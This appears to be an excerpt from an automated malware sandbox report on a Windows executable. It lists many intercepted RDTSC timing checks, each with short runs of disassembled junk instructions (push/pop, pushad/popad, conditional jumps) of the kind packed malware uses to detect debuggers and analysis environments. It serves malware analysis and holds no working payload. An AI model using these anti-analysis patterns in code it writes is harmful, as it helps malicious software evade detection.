    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4900 second address: CF4930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB5F8D48AB6h 0x0000000a popad 0x0000000b je 00007FB5F8D48ABEh 0x00000011 pushad 0x00000012 jl 00007FB5F8D48AB6h 0x00000018 jmp 00007FB5F8D48ABEh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C5B second address: CF4C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C68 second address: CF4C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C6E second address: CF4C94 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB5F8D48006h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB5F8D48018h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C94 second address: CF4C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C9A second address: CF4CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5586 second address: CF558B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF558B second address: CF5591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5591 second address: CF5595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5806 second address: CF581E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48012h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF581E second address: CF5823 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5823 second address: CF582C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF582C second address: CF5832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5832 second address: CF5836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5836 second address: CF583A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5DEF second address: CF5DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB5F8D48006h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5DF9 second address: CF5DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5DFD second address: CF5E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9EDE second address: CF9EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB5F8D48AC5h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA1AE second address: CFA1BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB5F8D48006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA1BE second address: CFA1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA1C2 second address: CFA1D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D4800Bh 0x00000007 jns 00007FB5F8D48006h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA31D second address: CFA321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00526 second address: D0053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48011h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0053B second address: D00544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0934A second address: D09366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D4800Ch 0x00000009 popad 0x0000000a push ebx 0x0000000b jbe 00007FB5F8D48006h 0x00000011 pop ebx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07594 second address: D075B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48ABCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB5F8D48AB6h 0x00000012 jp 00007FB5F8D48AB6h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D075B3 second address: D075B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D075B9 second address: D075C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FB5F8D48AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D076EB second address: D076F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D076F1 second address: D07729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB5F8D48AC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB5F8D48AC8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07729 second address: D0772D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08250 second address: D08254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08254 second address: D08278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48015h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c je 00007FB5F8D48006h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D083C7 second address: D083D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB5F8D48AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D083D1 second address: D083DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB5F8D4800Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D083DF second address: D0840F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FB5F8D48ABAh 0x0000000b jbe 00007FB5F8D48AB8h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB5F8D48AC2h 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0840F second address: D08413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08413 second address: D08417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D091C7 second address: D091CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07179 second address: D07181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FBAC second address: C5FBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB5F8D48017h 0x0000000a pop esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB5F8D48017h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FBE5 second address: C5FBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D208B4 second address: D208BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D208BA second address: D208CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FB5F8D48AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007FB5F8D48AC2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D208CE second address: D208D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D208D4 second address: D208D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D208D8 second address: D208DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25747 second address: D25755 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB5F8D48AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D298A0 second address: D298B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB5F8D48006h 0x0000000a jnc 00007FB5F8D48006h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D315E2 second address: D31617 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FB5F8D48ABBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB5F8D48AC8h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007FB5F8D48ABAh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34729 second address: D34741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48014h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D394C3 second address: D394CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D397C2 second address: D397C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D398F6 second address: D39900 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB5F8D48AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39900 second address: D39930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB5F8D48015h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB5F8D4800Dh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39930 second address: D3994D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3994D second address: D39958 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FB5F8D48006h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39AC3 second address: D39AEE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB5F8D48AB6h 0x00000008 jns 00007FB5F8D48AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FB5F8D48AB8h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB5F8D48ABEh 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39AEE second address: D39AFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39AFA second address: D39AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39AFE second address: D39B08 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB5F8D48006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39B08 second address: D39B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A801 second address: D3A83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48015h 0x00000007 jmp 00007FB5F8D48014h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007FB5F8D48012h 0x00000014 jg 00007FB5F8D48006h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F228 second address: D3F22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F22C second address: D3F232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F232 second address: D3F237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F237 second address: D3F23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EDFF second address: D3EE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CCDD second address: D4CCE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CCE3 second address: D4CCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F802 second address: D4F806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F806 second address: D4F80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F80A second address: D4F81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB5F8D48006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F81A second address: D4F820 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F820 second address: D4F83F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB5F8D48008h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB5F8D4800Bh 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F83F second address: D4F85A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB5F8D48ABEh 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jl 00007FB5F8D48AB6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D50E19 second address: D50E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FB5F8D48006h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DAAC second address: D5DAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DAB0 second address: D5DAD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB5F8D48006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FB5F8D4800Fh 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DAD2 second address: D5DADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DADA second address: D5DAEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5F8D48010h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D953 second address: D5D96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB5F8D48AC2h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D96D second address: D5D973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D973 second address: D5D977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601C5 second address: D601C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601C9 second address: D601DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB5F8D48ABBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601DF second address: D601E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601E3 second address: D60204 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007FB5F8D48AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FB5F8D48ABDh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60204 second address: D60208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78A9E second address: D78AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78AA7 second address: D78AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78AAE second address: D78AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78AB4 second address: D78ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78ABA second address: D78ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78ABE second address: D78AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78C0F second address: D78C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48AC3h 0x00000009 pop edi 0x0000000a jmp 00007FB5F8D48AC3h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78C3D second address: D78C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78C43 second address: D78C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79359 second address: D7935D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7935D second address: D7936F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007FB5F8D48AB6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7936F second address: D7937B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB5F8D48006h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7937B second address: D793A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB5F8D48AC7h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FB5F8D48AB6h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79696 second address: D7969C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
